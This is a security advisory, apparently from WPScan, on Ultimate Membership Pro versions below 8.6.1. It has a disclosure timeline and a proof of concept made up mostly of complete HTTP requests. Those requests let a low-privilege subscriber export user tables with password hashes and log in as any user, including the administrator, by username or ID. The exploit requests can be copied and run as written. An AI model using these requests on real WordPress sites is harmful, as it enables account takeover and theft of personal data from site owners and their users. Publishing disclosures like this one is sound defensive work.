Ultimate Membership Pro < 8.6.1 – Multiple Critical Vulnerabilities

Description

Multiple Critical Vulnerabilities found in Ultimate Membership Pro could leads to Authenticated (using a low privilege account, such as subscriber) Remote Code Execution on default Installation, as well as PII disclosure (such as emails, IP addresses, hashed passwords, usernames, User-Agent and so on), due to lack of authorisation checks.

Edit (WPScanTeam):
February 3rd, 2020 - Report Received & Envato Contacted
February 4th, 2020 - Envato Investigating
February 4th, 2020 - v8.6.1 released, devs replied (via Envato) that the issues were due to the nulled plugin used by the researcher. We can confirm that the issues were valid and not due to a nulled plugin liked claimed. Furthermore, the attempted fixes are not sufficient enough and Envato has been notified again.

Proof of Concept

All vulnerabilities require at least a subscriber account.
===============================================================================================================================
1. Export Settings, Postmeta And Users Data Including Passwords Hashes And User Roles, As a Low Privileged User i.e. subscriber (in versions <= 8.6)
===============================================================================================================================


-------------------------------------------
Request Headers To Dump Export File (Start)
-------------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: {subscriber cookies}

action=ihc_make_export_file&import_users=1&import_settings=1&import_postmeta=1
-----------------------------------------
Request Headers To Dump Export File (End)
-----------------------------------------


Response from above request throws XML File URL that contains the critical data i.e. like following
http://example.com/wordpress/wp-content/plugins/indeed-membership-pro/export.xml

Following tables are fetched in that XML File

wp_users
wp_usermeta
wp_ihc_orders
wp_ihc_orders_meta
wp_ihc_security_login
wp_ihc_user_levels
wp_ihc_user_logs
wp_indeed_members_payments
wp_options
wp_ihc_notifications
wp_ihc_invitation_codes
wp_ihc_coupons
wp_ihc_debug_payments
wp_ihc_gift_templates
wp_ihc_taxes
wp_postmeta


===================================================================================================
2. Login As Any Registered User In Database Including Administrator, By Just Knowing Username or ID (in versions 7.3 to 8.6)
===================================================================================================


-------------------------------------------------
Request Headers To Login Through Username (Start)
-------------------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: {subscriber cookies}

action=ihc_generate_direct_link&username=admin
-----------------------------------------------
Request Headers To Login Through Username (End)
-----------------------------------------------


Response from above request will throw a Link which upon opening, leads to direct administrator login without requiring any credentials i.e. following
http://example.com/wordpress/?ihc_action=dl&token=94bb1bcba42feb2e19565a44b3d96838fef9e791


-------------------------------------------
Request Headers To Login Through ID (Start)
-------------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: {subscriber cookies}

action=ihc_generate_direct_link_by_uid&uid=1
-----------------------------------------
Request Headers To Login Through ID (End)
-----------------------------------------


Response from above request will throw a Link which upon opening, leads to direct administrator login without requiring any credentials i.e. following
http://example.com/wordpress/?ihc_action=dl&token=94bb1bcba42feb2e19565a44b3d96838fef9e791


To make it more efficient, Username or ID of Administrator can also be extracted through the 1st vulnerability i.e. export.xml because it contains Usernames, IDs and their Roles.